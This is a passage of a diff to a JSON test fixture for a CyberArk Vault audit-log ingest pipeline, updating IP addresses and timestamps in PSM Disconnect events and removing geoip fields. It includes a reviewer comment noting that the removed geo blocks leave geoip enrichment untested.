@@ -324,8 +306,8 @@ "event": { "severity": 2, "duration": 11000000000, - "ingested": "2021-06-09T10:24:31.624798Z", - "original": "\u003c5\u003e1 2021-03-11T17:47:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:47:01\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:47:01Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty 
Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:47:01\",\"IsoTimestamp\":\"2021-03-11T17:47:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:49.813728600Z", + "original": "\u003c5\u003e1 2021-03-11T17:47:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:47:01\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:47:01Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n 
\u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 
09:47:01\",\"IsoTimestamp\":\"2021-03-11T17:47:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", "action": "psm disconnect", @@ -348,20 +330,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -385,7 +358,7 @@ }, "@timestamp": "2021-03-11T17:48:40.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" 
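Review bot: In the `@@ -348,20 +330,11 @@` hunk the regenerated expected document drops the whole `destination.geo` block for the PSM Disconnect event instead of replacing it with the geolocation of the new address `67.43.156.15`, so this case no longer asserts that the geoip processor enriches `destination.ip` at all. The same pattern repeats in the later `destination` hunks of this file, while `source.geo` is not visible here, so I cannot tell from the diff whether the loss is specific to `destination`. If the GeoIP test database used by the pipeline tests is expected to resolve `67.43.156.0/24`, the absent block suggests the geoip step did not fire on this field and the fixture should be regenerated after checking the processor's condition; if the range is intentionally unresolved in that database, please say so in the PR description so reviewers do not read the removed `geo` object as a regression. Either way, consider keeping at least one event in this fixture whose `destination.ip` does produce `geo` fields so the enrichment stays covered.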
@@ -397,15 +370,15 @@ ], "ip": [ "10.0.2.2", - "34.123.103.115", - "81.32.170.205" + "67.43.156.15", + "67.43.156.13" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-11T17:48:40Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:48:40\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:48:40Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" 
Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:48:40\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:48:40Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" 
Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "PSM Disconnect", "issuer": "Administrator", "extra_details": { @@ -418,21 +391,21 @@ "psmid": "PSMServer", "session_id": "f6acbf00-8291-11eb-b9ba-080027efd402", "src_host": "10.0.2.2", - "dst_host": "34.123.103.115", + "dst_host": "67.43.156.15", "session_duration": "00:00:12" }, "rfc5424": true, "ca_properties": { "other": {}, "device_type": "Operating System", - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "policy_id": "UnixSSHKeys", "user_name": "adrian" }, - "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian", + "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian", "safe": "PSM", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "PSM Disconnect", "timestamp": "Mar 11 09:48:40", "desc": "PSM Disconnect" 
@@ -444,8 +417,8 @@ "event": { "severity": 2, "duration": 12000000000, - "ingested": "2021-06-09T10:24:31.624801600Z", - "original": "\u003c5\u003e1 2021-03-11T17:48:40Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:48:40\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:48:40Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty 
Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:48:40\",\"IsoTimestamp\":\"2021-03-11T17:48:40Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:49.813781400Z", + "original": "\u003c5\u003e1 2021-03-11T17:48:40Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:48:40\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:48:40Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n 
\u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 
09:48:40\",\"IsoTimestamp\":\"2021-03-11T17:48:40Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", "action": "psm disconnect", @@ -468,20 +441,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -505,7 +469,7 @@ }, "@timestamp": "2021-03-11T17:55:02.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" 
@@ -517,15 +481,15 @@ ], "ip": [ "10.0.2.2", - "34.123.103.115", - "81.32.170.205" + "67.43.156.15", + "67.43.156.13" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-11T17:55:02Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:55:02\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:55:02Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" 
Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:55:02\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:55:02Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e302\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" 
